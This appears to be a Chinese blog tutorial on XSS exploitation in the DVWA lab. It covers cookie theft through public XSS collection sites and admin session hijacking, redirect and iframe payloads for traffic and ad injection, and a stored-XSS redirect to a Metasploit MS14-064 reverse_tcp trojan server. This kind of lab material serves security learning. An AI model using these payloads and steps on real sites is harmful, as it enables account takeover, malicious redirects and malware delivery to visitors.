XSS漏洞利用方式彙總

以下所有的針對XSS的利用方式都是對XSS的深一步的學習瞭解、請勿於未授權環境下進行非法操作!!!

在這裏插入圖片描述

一、竊取Cookie

1.1 目的

  惡意攻擊者通過XSS攻擊,竊取其他賬戶的Cookie信息從而進行未授權非法操作。

1.2 實操

搭建xss平臺

這裏我直接百度一個xss平臺來接Cookie

Tips:爲了安全起見,建議使用自己搭建的XSS平臺(如測試學習,不敏感的話隨意)

》》註冊一個測試賬號([email protected]:fengyue123)
xss平臺:

  • https://xss.pt
  • https://xsshs.cn
    在這裏插入圖片描述
    》》任意創建一個項目
    在這裏插入圖片描述
    在這裏插入圖片描述
    》》複製payload
    在這裏插入圖片描述

獲取Cookie

》》這裏我們使用靶場DVWA進行測試,在存在xss地方輸入payload:

在這裏插入圖片描述
》》點擊提交後即可在解cookie平臺獲取到當前賬戶的cookie和真實IP:
在這裏插入圖片描述
》》使用管理員的cookie登錄系統(使用Chrome上的F12開發者工具,將拿到的Cookie值放入到Application中,瀏覽器輸入跳轉的目的地址回車便成功登錄他人賬戶)
在這裏插入圖片描述

二、廣告傳播/SEO優化/刷取流量

2.1 目的

  通過惡意的JS代碼將正常頁面跳轉到目的頁面,利用網站進行重定向實現其引流、廣告位傳播等目的。

2.2 實操

2.2.1 惡意刷取訪問量

網頁直接跳轉
<script type="text/javascript">window.location.href="跳轉的目的地址";</script>
<script type="text/javascript">window. location.replace("跳轉的目的地址");</script>

》》爲了體現效果,對靶機DVWA 存儲型XSS處插入JS代碼實現網頁跳轉:
(用戶一訪問到此頁面就自動訪問訪問我博客的某一篇文章,訪問量就+1)
在這裏插入圖片描述

網頁延遲跳轉

(網頁停留三秒後再進行跳轉)

<script type="text/javascript">
  function jumurl(){
  window.location.href = 'https://www.baidu.com';
  }
  setTimeout(jumurl,3000);
</script>

2.2.2 惡意廣告展示

這裏可以通過導入外鏈的方式對受害站點插入廣告位,以來傳播廣告

<script>document.writeln("<iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='2000' height='5000' allowTransparency src=https://blog.csdn.net/Aaron_Miller/article/details/105918848></iframe>");</script>

在這裏插入圖片描述

三、網頁掛馬/權限提升

3.1 目的

  通過木馬服務器(kali)搭建生成一個惡意URL地址,並通過存儲型XSS掛到頁面中。只要存在未打相應補丁的用戶訪問了掛馬頁面,惡意攻擊者便獲取到了受害者的控制權限(重點在於目的系統是否打了相應補丁)

3.2 環境

  • 木馬服務器(Kali  MS14-064  IP:192.168.7.129)
  • 受害者(Windows Server 2003 R2  IP:192.168.7.136)
  • 存在XSS的服務器(Win10 DVWA靶機 IP:192.168.1.103)

3.3 實操

3.3.1 生成木馬URL

》》啓動Metasploit
在這裏插入圖片描述
》》調用緩衝區溢出漏洞MS14-064(影響範圍Win95-Win10,觸發該漏洞條件要客戶端裝有power shell,詳情見:微軟官網
在這裏插入圖片描述
》》設置木馬服務器IP,允許調用powsershell
在這裏插入圖片描述
》》調用反彈連接payload

Tips:reverse_tcp好處:靶機主動連接我們,不用擔心靶機防火牆的問題

在這裏插入圖片描述
》》設置監聽IP,使用默認監聽端口4444,執行攻擊(自動生成攻擊地址)
在這裏插入圖片描述

3.3.2 XSS插入地址

》》惡意攻擊者通過存儲型xss將木馬服務器生成的地址插入到網站中:

<script type="text/javascript">window.location.href="http://192.168.7.129:8080/W0fGq97a2ICU0
";</script>

在這裏插入圖片描述
》》當存在ms14-064漏洞的主機訪問到該頁面,攻擊者就會獲取到目的服務器操作系統的權限(如開啓攝像頭、添加用戶、截屏、錄音等)
(win2003r2模擬訪問)
在這裏插入圖片描述

在這裏插入圖片描述
在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章